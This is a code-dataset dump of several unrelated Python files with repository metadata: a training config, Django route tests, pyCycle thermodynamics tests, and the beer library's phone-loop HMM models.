# 'train_batch_size' : 4,
# 'infer_batch_size' : 4,
# 'freeze' : True,
# # path to load, -1 to auto load checkpoint from previous phase,
# # None to start from scratch
# 'pretrained' : 'resnet50-19c8e357.pth',
# },
# {
# 'nr_epochs' : 30,
# 'optimizer' : [
# optim.Adam,
# { # should match keyword for parameters within the optimizer
# 'lr' : 2.5e-5, # initial learning rate,
# 'weight_decay' : 0.02
# }
# ],
# 'scheduler' : None, # learning rate scheduler
# 'train_batch_size' : 4,
# 'infer_batch_size' : 4,
# 'freeze' : False,
# # path to load, -1 to auto load checkpoint from previous phase,
# # None to start from scratch
# 'pretrained' : -1,
# },
{
'nr_epochs' : 60,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
# 'weight_decay' : 0.02
}
],
'scheduler' : lambda x : optim.lr_scheduler.StepLR(x, 30), # learning rate scheduler
'train_batch_size' : 2,
'infer_batch_size' : 4,
'freeze' : False,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
},
],
}
scale_add = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02 # weight decay is L2 regularizer
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
scale_concat = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
scale_conv = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
baseline = {
'nr_classes' : 2,
'training_phase' : [{
'nr_epochs' : 30,
'optimizer' : [
optim.Adam,
{ # should match keyword for parameters within the optimizer
'lr' : 1.0e-4, # initial learning rate,
'weight_decay' : 0.02
}
],
'scheduler' : None, # learning rate scheduler
'train_batch_size' : 4,
'infer_batch_size' : 4,
'freeze' : True,
# path to load, -1 to auto load checkpoint from previous phase,
# None to start from scratch
'pretrained' : 'resnet50-19c8e357.pth',
}],
}
| 32.965986
| 97
| 0.475856
| 469
| 4,846
| 4.795309
| 0.144989
| 0.0747
| 0.057803
| 0.0747
| 0.940418
| 0.940418
| 0.924855
| 0.924855
| 0.924855
| 0.924855
| 0
| 0.0474
| 0.416632
| 4,846
| 146
| 98
| 33.191781
| 0.748143
| 0.422204
| 0
| 0.695652
| 0
| 0
| 0.241202
| 0.03849
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01087
| 0
| 0.01087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad3ac284afdd9255b9762bfc9783219139ee6367
| 6,330
|
py
|
Python
|
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | null | null | null |
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | 44
|
2021-10-14T15:44:46.000Z
|
2021-12-05T00:57:23.000Z
|
socialdistribution/app/tests.py
|
CMPUT404-Project-Group/Social-Distribution-CMPUT404-Group-Project
|
e541cc609f260d7221fe0be8975c5b2444d74af0
|
[
"W3C-20150513"
] | 1
|
2021-12-07T01:14:14.000Z
|
2021-12-07T01:14:14.000Z
|
from django.test import Client, TestCase
from api.models import User
from api.tests.utils import TestUtils
class FrontEndRouteTest(TestCase):
"""
    Tests that all routes return correct responses and use correct templates.
"""
def setUp(self):
self.c = Client()
self.dn = 'frontend'
self.p = 'frontendtests1'
self.user = User.objects.create_user(
email='[email protected]',
displayName=self.dn,
github='frontend',
password=self.p,
type='author'
)
def test_login_form(self):
response = self.c.get('/app/accounts/login/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'registration/login.html')
def test_register_form(self):
response = self.c.get('/app/register/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/register.html')
def test_index(self):
# should redirect if user not logged in
response = self.c.get('/app/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/index.html')
# log in
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/index.html')
self.c.logout()
def test_inbox(self):
# should redirect if user not logged in
response = self.c.get(f'/app/author/{self.user.id}/inbox/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/inbox.html')
# CAN'T TEST THIS UNLESS WE MOCK THE INBOX REQUEST SOMEHOW?
# # log in
# self.c.login(displayName=self.dn, password=self.p)
# response = self.c.get(f'/app/author/{self.user.id}/inbox/')
# self.assertEqual(response.status_code, 200)
# self.assertTemplateUsed(response, 'app/inbox.html')
# self.c.logout()
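    # NOTE: the leading underscore keeps unittest from auto-discovering the
    # method below as a test; left unrenamed since this may be intentional.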
def _create_post(self):
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/create-post/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/create_post.html')
def test_edit_post(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/edit-post/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/edit_post.html')
self.c.logout()
def test_delete_post(self):
# should redirect if user not logged in
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/delete-post/{post.id}')
self.assertEqual(response.status_code, 403)
self.assertTemplateNotUsed(response, 'app/inbox.html')
# should allow logged in user to delete
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/posts/delete-post/{post.id}')
self.assertEqual(response.status_code, 200)
self.c.logout()
def test_view_post(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'posts/view_post.html')
self.c.logout()
def test_create_comment(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}/create-comment')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'comments/create_comment.html')
self.c.logout()
def test_view_comments(self):
self.c.login(displayName=self.dn, password=self.p)
post = TestUtils.get_test_post(author=self.user)
response = self.c.get(f'/app/posts/{post.id}/comments')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'comments/comments.html')
self.c.logout()
def test_view_profile(self):
# should redirect if not logged in
response = self.c.get('/app/profile/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'profile/view_profile.html')
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/profile/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/view_profile.html')
self.c.logout()
def test_manage_profile(self):
# should redirect if not logged in
response = self.c.get('/app/profile/manage/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'profile/manage_profile.html')
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/profile/manage/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/manage_profile.html')
self.c.logout()
def test_view_other_user(self):
other_user = User.objects.create_user(
email='[email protected]',
displayName='other',
github='other',
password=self.p,
type='author'
)
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get(f'/app/profile/{other_user.id}')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'profile/view_other_user.html')
self.c.logout()
def test_logout(self):
self.c.login(displayName=self.dn, password=self.p)
response = self.c.get('/app/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'app/index.html')
self.c.get('/app/accounts/logout/')
response = self.c.get('/app/')
self.assertEqual(response.status_code, 302)
self.assertTemplateNotUsed(response, 'app/index.html')
| 37.678571
| 78
| 0.649131
| 794
| 6,330
| 5.086902
| 0.11335
| 0.054469
| 0.041594
| 0.079228
| 0.829661
| 0.808368
| 0.767022
| 0.708591
| 0.699926
| 0.683585
| 0
| 0.012373
| 0.221169
| 6,330
| 168
| 79
| 37.678571
| 0.806897
| 0.093207
| 0
| 0.533898
| 0
| 0
| 0.148537
| 0.081801
| 0
| 0
| 0
| 0
| 0.313559
| 1
| 0.127119
| false
| 0.110169
| 0.025424
| 0
| 0.161017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
ad45a7af91c5f3b0e9f72dc94827599ef0e1b042
| 20
|
py
|
Python
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 7
|
2022-03-08T16:04:45.000Z
|
2022-03-12T13:04:54.000Z
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 6
|
2022-03-08T04:51:05.000Z
|
2022-03-11T13:40:43.000Z
|
tftime/model/__init__.py
|
nagikomo/time-series-model
|
3a1a2b447c5bdabce9a0e24b6439854e3e599887
|
[
"MIT"
] | 1
|
2022-03-10T18:42:03.000Z
|
2022-03-10T18:42:03.000Z
|
from .sam import *
| 10
| 19
| 0.65
| 3
| 20
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 20
| 1
| 20
| 20
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ad4d86cf7a31b5d4a96fa2e362253cc9c70b8ae2
| 91
|
py
|
Python
|
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
modulepackage/decorator_assembly/spam/bar.py
|
Chyi341152/chyi-book
|
ddeaf49d69a68f5718c20c3b7fe6fd37381d21eb
|
[
"MIT"
] | null | null | null |
# bar.py
from . import export
@export
class Bar(object):
pass
print('bar imported')
| 9.1
| 21
| 0.67033
| 13
| 91
| 4.692308
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208791
| 91
| 9
| 22
| 10.111111
| 0.847222
| 0.065934
| 0
| 0
| 0
| 0
| 0.144578
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
ad7110b998e4ace78009eaff5c87ea02c37cecbc
| 5,411
|
py
|
Python
|
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
pycycle/thermo/cea/test/test_mix_ratio.py
|
askprash/pyCycle
|
e0845d7e320b6cb47367734c26ec3410c9fa5bf7
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import numpy as np
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal, assert_check_partials
from pycycle.thermo.cea import species_data
from pycycle.constants import AIR_ELEMENTS, AIR_FUEL_ELEMENTS
from pycycle.thermo.cea.thermo_add import ThermoAdd
class ThermoAddTestCase(unittest.TestCase):
def test_mix_1fuel(self):
thermo_spec = species_data.janaf
air_thermo = species_data.Properties(thermo_spec, init_elements=AIR_ELEMENTS)
p = om.Problem()
fuel = 'JP-7'
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_ELEMENTS, mix_mode='reactant',
mix_elements=fuel, mix_names='fuel')
p.setup(force_alloc_complex=True)
# p['Fl_I:stat:P'] = 158.428
p['Fl_I:stat:W'] = 38.8
p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = air_thermo.b0
p['fuel:ratio'] = 0.02673
p.run_model()
tol = 5e-7
assert_near_equal(p['mass_avg_h'], 176.65965638, tolerance=tol)
assert_near_equal(p['Wout'], 39.837124, tolerance=tol)
assert_near_equal(p['fuel:W'], p['Fl_I:stat:W']*p['fuel:ratio'], tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
# data = p.check_partials(out_stream=None, method='cs')
data = p.check_partials(method='cs')
assert_check_partials(data, atol=1.e-6, rtol=1.e-6)
def test_mix_2fuel(self):
thermo_spec = species_data.janaf
air_thermo = species_data.Properties(thermo_spec, init_elements=AIR_ELEMENTS)
p = om.Problem()
fuel = 'JP-7'
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_ELEMENTS, mix_mode='reactant',
mix_elements=[fuel, fuel], mix_names=['fuel1','fuel2'])
p.setup(force_alloc_complex=True)
# p['Fl_I:stat:P'] = 158.428
p['Fl_I:stat:W'] = 38.8
p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = air_thermo.b0
# half the ratio from the 1 fuel test
ratio = 0.02673/2.
p['fuel1:ratio'] = ratio
p['fuel2:ratio'] = ratio
p.run_model()
tol = 5e-7
assert_near_equal(p['mass_avg_h'], 176.65965638, tolerance=tol)
assert_near_equal(p['Wout'], 39.837124, tolerance=tol)
assert_near_equal(p['fuel1:W'], p['Fl_I:stat:W']*ratio, tolerance=tol)
assert_near_equal(p['fuel2:W'], p['Fl_I:stat:W']*ratio, tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
data = p.check_partials(out_stream=None, method='cs')
# data = p.check_partials(method='cs')
assert_check_partials(data, atol=1.e-6, rtol=1.e-6)
def test_mix_1flow(self):
thermo_spec = species_data.janaf
p = om.Problem()
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_FUEL_ELEMENTS, mix_mode='flow',
mix_elements=AIR_ELEMENTS, mix_names='mix')
p.setup(force_alloc_complex=True)
p['Fl_I:stat:W'] = 62.15
p['Fl_I:tot:composition'] = [0.000313780313538, 0.0021127831122, 0.004208814234964, 0.052325087161902, 0.014058631311261]
p['mix:W'] = 4.44635
p['mix:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p.run_model()
tol = 5e-7
assert_near_equal(p['Wout'], 62.15+4.44635, tolerance=tol)
# assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.00031442, 0.00197246, 0.00392781, 0.05243129, 0.01408717]), tolerance=tol)
def test_mix_2flow(self):
thermo_spec = species_data.janaf
p = om.Problem()
p.model = ThermoAdd(inflow_thermo_data=thermo_spec, mix_thermo_data=thermo_spec,
inflow_elements=AIR_FUEL_ELEMENTS, mix_mode='flow',
mix_elements=[AIR_ELEMENTS, AIR_ELEMENTS], mix_names=['mix1', 'mix2'])
p.setup(force_alloc_complex=True)
p['Fl_I:stat:W'] = 62.15
# p['Fl_I:tot:h'] = 181.381769
p['Fl_I:tot:composition'] = [0.000313780313538, 0.0021127831122, 0.004208814234964, 0.052325087161902, 0.014058631311261]
p['mix1:W'] = 4.44635/2
p['mix1:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p['mix2:W'] = 4.44635/2
p['mix2:composition'] = [3.23319258e-04, 1.10132241e-05, 5.39157736e-02, 1.44860147e-02]
p.run_model()
tol = 5e-7
assert_near_equal(p['Wout'], 62.15+4.44635, tolerance=tol)
# assert_near_equal(p['composition_out'], np.array([0.0003149, 0.00186566, 0.00371394, 0.05251212, 0.01410888]), tolerance=tol)
assert_near_equal(p['composition_out'], np.array([0.00031442, 0.00197246, 0.00392781, 0.05243129, 0.01408717]), tolerance=tol)
if __name__ == "__main__":
unittest.main()
| 35.598684
| 135
| 0.635927
| 773
| 5,411
| 4.227684
| 0.172057
| 0.04896
| 0.073439
| 0.073439
| 0.836903
| 0.823133
| 0.820073
| 0.820073
| 0.820073
| 0.820073
| 0
| 0.175292
| 0.225097
| 5,411
| 152
| 136
| 35.598684
| 0.604102
| 0.085197
| 0
| 0.62069
| 0
| 0
| 0.094699
| 0
| 0
| 0
| 0
| 0
| 0.183908
| 1
| 0.045977
| false
| 0
| 0.08046
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad8253869c8418ffec6fd1159b470f6e8d99d461
| 8,290
|
py
|
Python
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 46
|
2018-02-27T18:15:08.000Z
|
2022-02-16T22:10:55.000Z
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 16
|
2018-01-26T14:18:51.000Z
|
2021-02-05T09:34:00.000Z
|
beer/models/phoneloop.py
|
bolajiy/beer
|
6fe968c7ca4864437890aa6bd705755c2580696e
|
[
"MIT"
] | 26
|
2018-03-12T14:03:26.000Z
|
2021-05-24T21:15:01.000Z
|
import torch
from .hmm import HMM
from .categorical import Categorical
from .categoricalset import CategoricalSet
from .parameters import ConjugateBayesianParameter
from ..utils import logsumexp
__all__ = ['PhoneLoop', 'BigramPhoneLoop']
class PhoneLoop(HMM):
'Phone Loop HMM.'
@classmethod
def create(cls, graph, start_pdf, end_pdf, modelset, categorical=None,
prior_strength=1.0):
'''Create a PhoneLoop model.
Args:
graph (:any:`CompiledGraph`): Decoding graph of the
phone-loop.
start_pdf (dict): Mapping symbol/start state of the
corresponding sub-HMM.
end_pdf (dict): Mapping symbol/end state of the
corresponding sub-HMM.
categorical (``Categorical``): Categorical model of the
mixing weights.
prior_strength (float): Strength of the prior over the
weights.
'''
# We look at one parameter to check the type of the model.
bayes_param = modelset.mean_field_factorization()[0][0]
tensor = bayes_param.prior.natural_parameters()
dtype, device = tensor.dtype, tensor.device
if categorical is None:
weights = torch.ones(len(start_pdf), dtype=dtype, device=device)
weights /= len(start_pdf)
categorical = Categorical.create(weights, prior_strength)
return cls(graph, modelset, start_pdf, end_pdf, categorical)
def __init__(self, graph, modelset, start_pdf, end_pdf, categorical):
super().__init__(graph, modelset)
self.start_pdf = start_pdf
self.end_pdf = end_pdf
self.categorical = categorical
param = self.categorical.mean_field_factorization()[0][0]
param.register_callback(self._on_weights_update)
self._on_weights_update()
def _on_weights_update(self):
mean = self.categorical.mean
tensorconf = {'dtype': mean.dtype, 'device': mean.device,
'requires_grad': False}
data = torch.eye(len(self.start_pdf), **tensorconf)
stats = self.categorical.sufficient_statistics(data)
log_weights = self.categorical.expected_log_likelihood(stats)
start_idxs = [value for value in self.start_pdf.values()]
for end_idx in self.end_pdf.values():
loop_prob = self.graph.trans_log_probs[end_idx, end_idx].exp()
residual_log_prob = (1 - loop_prob).log()
self.graph.trans_log_probs[end_idx, start_idxs] = \
residual_log_prob + log_weights
####################################################################
# Model interface.
def mean_field_factorization(self):
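        # Pad the shorter factorization list with empty parameter groups so
        # the two lists can be merged element-wise via zip below.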
l1 = self.modelset.mean_field_factorization()
l2 = self.categorical.mean_field_factorization()
diff = len(l1) - len(l2)
if diff > 0:
l2 += [[] for _ in range(abs(diff))]
else:
l1 += [[] for _ in range(abs(diff))]
return [u + v for u, v in zip(l1, l2)]
def expected_log_likelihood(self, *args, **kwargs):
return super().expected_log_likelihood(*args, **kwargs)
def accumulate(self, stats, parent_msg=None):
retval = super().accumulate(stats, parent_msg)
# If the phone loop is trained with forced alignments, we don't
# train the transitions.
if 'trans_resps' in self.cache:
trans_resps = self.cache['trans_resps'].sum(dim=0)
start_idxs = [value for value in self.start_pdf.values()]
end_idxs = [value for value in self.end_pdf.values()]
phone_resps = trans_resps[:, start_idxs]
phone_resps = phone_resps[end_idxs, :].sum(dim=0)
phone_resps += self.cache['resps'][0][start_idxs]
resps_stats = self.categorical.sufficient_statistics(
phone_resps.view(1, -1))
retval.update(self.categorical.accumulate(resps_stats))
else:
fake_stats = torch.zeros_like(self.categorical.mean, requires_grad=False)
retval.update(self.categorical.accumulate(fake_stats[None, :]))
return retval
class BigramPhoneLoop(HMM):
    'Phone Loop HMM with a bigram phonotactic language model.'
@classmethod
def create(cls, graph, start_pdf, end_pdf, modelset, categoricalset=None,
prior_strength=1.0):
'''Create a BigramPhoneLoop model.
Args:
graph (:any:`CompiledGraph`): Decoding graph of the
phone-loop.
start_pdf (dict): Mapping symbol/start state of the
corresponding sub-HMM.
end_pdf (dict): Mapping symbol/end state of the
corresponding sub-HMM.
categoricalset (``CategoricalSet``): Set of categorical models
of the mixing weights.
prior_strength (float): Strength of the prior over the
weights.
'''
# We look at one parameter to check the type of the model.
bayes_param = modelset.mean_field_factorization()[0][0]
tensor = bayes_param.prior.natural_parameters()
dtype, device = tensor.dtype, tensor.device
if categoricalset is None:
weights = torch.ones(len(start_pdf), len(start_pdf), dtype=dtype,
device=device)
weights /= len(start_pdf)
categoricalset = CategoricalSet.create(weights, prior_strength)
return cls(graph, modelset, start_pdf, end_pdf, categoricalset)
def __init__(self, graph, modelset, start_pdf, end_pdf, categoricalset):
super().__init__(graph, modelset)
self.start_pdf = start_pdf
self.end_pdf = end_pdf
self.categoricalset = categoricalset
param = self.categoricalset.mean_field_factorization()[0][0]
param.register_callback(self._on_weights_update)
self._on_weights_update()
def _on_weights_update(self):
mean = self.categoricalset.mean
tensorconf = {'dtype': mean.dtype, 'device': mean.device,
'requires_grad': False}
data = torch.eye(len(self.start_pdf), **tensorconf)
stats = self.categoricalset.sufficient_statistics(data)
log_weights = self.categoricalset.expected_log_likelihood(stats)
start_idxs = [value for value in self.start_pdf.values()]
for i, end_idx in enumerate(self.end_pdf.values()):
loop_prob = self.graph.trans_log_probs[end_idx, end_idx].exp()
residual_log_prob = (1 - loop_prob).log()
self.graph.trans_log_probs[end_idx, start_idxs] = \
residual_log_prob + log_weights[i]
####################################################################
# Model interface.
def mean_field_factorization(self):
l1 = self.modelset.mean_field_factorization()
l2 = self.categoricalset.mean_field_factorization()
diff = len(l1) - len(l2)
if diff > 0:
l2 += [[] for _ in range(abs(diff))]
else:
l1 += [[] for _ in range(abs(diff))]
return [u + v for u, v in zip(l1, l2)]
def expected_log_likelihood(self, *args, **kwargs):
return super().expected_log_likelihood(*args, **kwargs)
def accumulate(self, stats, parent_msg=None):
retval = super().accumulate(stats, parent_msg)
# If the phone loop is trained with forced alignments, we don't
# train the transitions.
if 'trans_resps' in self.cache:
trans_resps = self.cache['trans_resps']#.sum(dim=0)
start_idxs = [value for value in self.start_pdf.values()]
end_idxs = [value for value in self.end_pdf.values()]
phone_resps = trans_resps[:, :, start_idxs]
phone_resps = phone_resps[:, end_idxs, :]
resps_stats = self.categoricalset.sufficient_statistics(phone_resps)
retval.update(self.categoricalset.accumulate_from_jointresps(resps_stats))
else:
fake_stats = torch.zeros_like(self.categoricalset.mean,
requires_grad=False)
retval.update(self.categoricalset.accumulate(fake_stats[None, :]))
return retval
| 43.177083
| 86
| 0.616767
| 968
| 8,290
| 5.061983
| 0.143595
| 0.037551
| 0.044898
| 0.017143
| 0.845918
| 0.790816
| 0.76102
| 0.725102
| 0.713878
| 0.681633
| 0
| 0.006282
| 0.270326
| 8,290
| 191
| 87
| 43.403141
| 0.803769
| 0.156695
| 0
| 0.55814
| 0
| 0
| 0.028452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.046512
| 0.015504
| 0.217054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad83311d93890f3b9b3fc3aa7d3a87abef0b5382
| 208
|
py
|
Python
|
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | 1
|
2022-03-02T17:50:33.000Z
|
2022-03-02T17:50:33.000Z
|
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | null | null | null |
tests/_initial/test_initial.py
|
alfmorais/api-pbe-veicular
|
802a4c36a65b291956eef1eb12128380392518b3
|
[
"MIT"
] | null | null | null |
def test_initial():
first_number = 5
second_number = 6
assert (first_number + second_number) == 11
assert (first_number - second_number) == -1
assert (first_number * second_number) == 30
| 26
| 47
| 0.673077
| 27
| 208
| 4.851852
| 0.444444
| 0.335878
| 0.389313
| 0.526718
| 0.664122
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.225962
| 208
| 7
| 48
| 29.714286
| 0.770186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad8e97d0939f378e7a8f0c37161e26dbbaa47cf5
| 25
|
py
|
Python
|
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | 2
|
2016-01-31T22:32:31.000Z
|
2017-07-24T04:24:25.000Z
|
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | null | null | null |
facade/__init__.py
|
oakfang/facade
|
a6f258b69d562b77ae5558003fad4bd56389ad45
|
[
"MIT"
] | null | null | null |
from .base import loader
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d1529128f1eb4a240fbb679aa36c2ef84a095223
| 248
|
py
|
Python
|
openapi_server/utils/GenRandom.py
|
